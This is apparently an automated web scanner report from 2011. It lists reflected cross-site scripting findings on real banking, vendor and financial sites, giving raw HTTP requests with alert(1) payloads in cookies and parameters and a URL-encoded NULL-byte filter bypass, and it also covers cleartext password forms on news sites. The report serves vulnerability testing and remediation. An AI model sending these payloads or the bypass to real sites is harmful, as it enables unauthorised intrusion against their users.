GET /kr/network-infrastructure-security-report.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en4e2d6"><script>alert(1)</script>e91882c8043; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac374"><script>alert(1)</script>5a50e0c21ab was submitted in the mbfcookie[lang] cookie. This input was echoed as ac374\"><script>alert(1)</script>5a50e0c21ab in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /privacy_policy.php HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=enac374"><script>alert(1)</script>5a50e0c21ab; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9071"><script>alert(1)</script>e4e30e085f was submitted in the mbfcookie[lang] cookie. This input was echoed as a9071\"><script>alert(1)</script>e4e30e085f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=ena9071"><script>alert(1)</script>e4e30e085f; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54038"><script>alert(1)</script>1e95dab8e0e was submitted in the mbfcookie[lang] cookie. This input was echoed as 54038\"><script>alert(1)</script>1e95dab8e0e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/lost-password-3.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en54038"><script>alert(1)</script>1e95dab8e0e; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload deb1d"><script>alert(1)</script>cfcda14f30a was submitted in the mbfcookie[lang] cookie. This input was echoed as deb1d\"><script>alert(1)</script>cfcda14f30a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/partner-portal-home.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=endeb1d"><script>alert(1)</script>cfcda14f30a; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8239"><script>alert(1)</script>31f3540dcc0 was submitted in the mbfcookie[lang] cookie. This input was echoed as d8239\"><script>alert(1)</script>31f3540dcc0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /index.php HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=end8239"><script>alert(1)</script>31f3540dcc0; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b457f"><script>alert(1)</script>667bdae159f was submitted in the mbfcookie[lang] cookie. This input was echoed as b457f\"><script>alert(1)</script>667bdae159f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /index.php?option=com_content&task=view&id=296&Itemid=297 HTTP/1.1 Host: www.arbornetworks.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; mbfcookie[lang]=enb457f"><script>alert(1)</script>667bdae159f; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; __utmc=186398841; __utmb=186398841.2.10.1296689848
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bddb"><script>alert(1)</script>119487711af was submitted in the mbfcookie[lang] cookie. This input was echoed as 1bddb\"><script>alert(1)</script>119487711af in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /register.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en1bddb"><script>alert(1)</script>119487711af; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the BOA_0020 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0853'%3balert(1)//b444241d7da was submitted in the BOA_0020 cookie. This input was echoed as b0853';alert(1)//b444241d7da in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /privacy/Control.do HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9b0853'%3balert(1)//b444241d7da; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:05:17 GMT Content-type: text/html;charset=ISO-8859-1 Content-language: en-US Set-cookie: JSESSIONID=00004QCD_ZjewAQatQwb0kn5dXN:12qb4kb6q; Path=/ Set-cookie: INTL_LANG=en_US Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:05:16 GMT; Domain=.bankofamerica.com Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-control: no-cache="set-cookie, set-cookie2" Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1"> <meta name="Descri ...[SNIP]... <!--
The value of the BOA_0020 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3fed0'%3balert(1)//f83f2273ab8 was submitted in the BOA_0020 cookie. This input was echoed as 3fed0';alert(1)//f83f2273ab8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /privacy/index.jsp HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de93fed0'%3balert(1)//f83f2273ab8; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:05:15 GMT Content-type: text/html;charset=ISO-8859-1 Content-language: en-US Set-cookie: JSESSIONID=0000CnfCKRIifEAopeDjObSoiF3:12qb4k93q; Path=/ Set-cookie: INTL_LANG=en_US Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:05:14 GMT; Domain=.bankofamerica.com Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-control: no-cache="set-cookie, set-cookie2" Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1"> <meta name="Descri ...[SNIP]... <!--
The value of the BOA_0020 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0296'%3balert(1)//224de741dab was submitted in the BOA_0020 cookie. This input was echoed as a0296';alert(1)//224de741dab in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /smallbusiness/index.jsp HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9a0296'%3balert(1)//224de741dab; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:04:39 GMT Content-type: text/html;charset=ISO-8859-1 Content-language: en-US Set-cookie: JSESSIONID=0000iSQjObSnt8ukh_g0-dQwNmC:12qb4k2ev; Path=/ Set-cookie: INTL_LANG=en_US Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:04:38 GMT; Domain=.bankofamerica.com Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-control: no-cache="set-cookie, set-cookie2" Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en_US"> <head> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1"> <meta name="Descript ...[SNIP]... <!--
3.180. https://www.merrilledge.com/m/pages/merrill-edge-advisory-center.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.merrilledge.com
Path:
/m/pages/merrill-edge-advisory-center.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f9e1d"><script>alert(1)</script>a47d51819dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f9e1d"><script>alert(1)</script>a47d51819dc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /m/pages/merrill-edge-advisory-center.aspx?%00f9e1d"><script>alert(1)</script>a47d51819dc=1 HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the src_cd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %0095641'%3b9ef12e8200f was submitted in the src_cd parameter. This input was echoed as 95641';9ef12e8200f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /m/pages/merrill-edge-advisory-center.aspx?src_cd=BAC1%0095641'%3b9ef12e8200f HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the pxs cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c13e'-alert(1)-'c4f9da1816c was submitted in the pxs cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /IRA/pages/home.aspx HTTP/1.1 Host: www.retirement.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: pxs=689c136b798e446897d1c2e0184bb0f55c13e'-alert(1)-'c4f9da1816c; SMIDENTITY=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; pxv=4B1B9E90-7DD2-4095-A535-9FE88031C408; CMAVID=none; cmTPSet=Y; BrowserCheckDone=true;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 23:45:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 36286
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><meta http-equiv="Conten ...[SNIP]... <![CDATA[ lpAddVars('page','section','Home'); lpAddVars('page','ConversionStage','Home'); lpAddVars('page','Session ID','689c136b798e446897d1c2e0184bb0f55c13e'-alert(1)-'c4f9da1816c'); var cookieExists=false;Sys.Application.initialize(); Sys.Application.add_init(function() { $create(MerrillLynch.Application.ECMS.WebUI.ECMSContentCtrl, {"Application":"IRA","ContentLocations ...[SNIP]...
4. Cleartext submission of password
There are 19 instances of this issue:
Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.
Issue remediation
The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
GET /index.php?app=core&module=global&section=login HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
GET /resources/documentation/index.html HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://fis.com/fis/worldnews/worldnews.asp
The form contains the following password field:
password
Request
GET /fis/worldnews/worldnews.asp HTTP/1.1 Host: fis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 03 Feb 2011 00:54:33 GMT Connection: close Content-Length: 83533 Content-Type: text/html Set-Cookie: ASPSESSIONIDCASTCAST=LKGBFPGBNACCBLIDDPHBHANM; path=/ Cache-control: private
<html> <head> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <meta http-equiv="refresh" content="1800"> <title>FIS - Worldnews - Icelandic Group still up for grabs</title ...[SNIP]... <!-- LOGIN --> <form name="member_login">
GET /japan-news/1671/tuna-costs-254-000-in-japan/ HTTP/1.1 Host: insidejapantours.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: CSPSESSIONID-SP-80=00000001000039bv9MU3000000HVqGoe$mkIhY9X0_5aueuw--; path=/; CACHE-CONTROL: no-cache CONNECTION: Close DATE: Thu, 03 Feb 2011 01:02:54 GMT EXPIRES: Thu, 29 Oct 1998 17:04:19 GMT PRAGMA: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD Xhtml 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <link rel="alternate" type="application/rss+xml" title="Japan ...[SNIP]... <div class="pad5"><form method="post" action="/csp/jap/insidejapan/loginok.csp">
GET / HTTP/1.1 Host: ipboard-software.software.informer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Thu, 03 Feb 2011 01:02:55 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=kvc2qv4jlhknajb7ks0pmmn6m3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 17619
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://commerce.wsj.com/auth/submitlogin
The form contains the following password field:
password
Request
GET /article/SB10001424052748703779704576073610615364334.html HTTP/1.1 Host: online.wsj.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:04:22 GMT Server: Apache/2.0.58 (Unix) Set-Cookie: djcs_route=2c5be191-dbef-49ce-b161-dd9949a1fa00; domain=.wsj.com; path=/; Expires=Sat Jan 30 20:04:22 2021; max-age=315360000 Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Fri, 03-Feb-2012 01:04:22 GMT Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com FastDynaPage-ServerInfo: sbkj2kapachep04 - Wed 02/02/11 - 16:54:45 EST Cache-Control: max-age=15 Expires: Thu, 03 Feb 2011 01:04:37 GMT Vary: Accept-Encoding P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC Keep-Alive: timeout=2, max=30 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 183840
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://commerce.wsj.com/auth/submitlogin
The form contains the following password field:
password
Request
GET /article/SB10001424052748703956604576110453371369740.html HTTP/1.1 Host: online.wsj.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:04:24 GMT Server: Apache/2.0.58 (Unix) Set-Cookie: djcs_route=dc538be4-28ab-4562-9b58-129c8fc82f54; domain=.wsj.com; path=/; Expires=Sat Jan 30 20:04:24 2021; max-age=315360000 Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Fri, 03-Feb-2012 01:04:24 GMT Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com FastDynaPage-ServerInfo: sbkj2kapachep08 - Wed 02/02/11 - 15:46:44 EST Cache-Control: max-age=15 Expires: Thu, 03 Feb 2011 01:04:39 GMT Vary: Accept-Encoding P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC Keep-Alive: timeout=2, max=32 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 199594
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /yourtown/news/north_end/2011/01/fishers_fight_claims_that_blue.html HTTP/1.1 Host: www.boston.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en"> <head> <!-- Need for HL --> <script language="JavaScript"><!--
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.care2.com/passport/login.html
The form contains the following password field:
password
Request
GET /greenliving/bluefin-tuna-sells-for-396000.html HTTP/1.1 Host: www.care2.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml ...[SNIP]... <br />
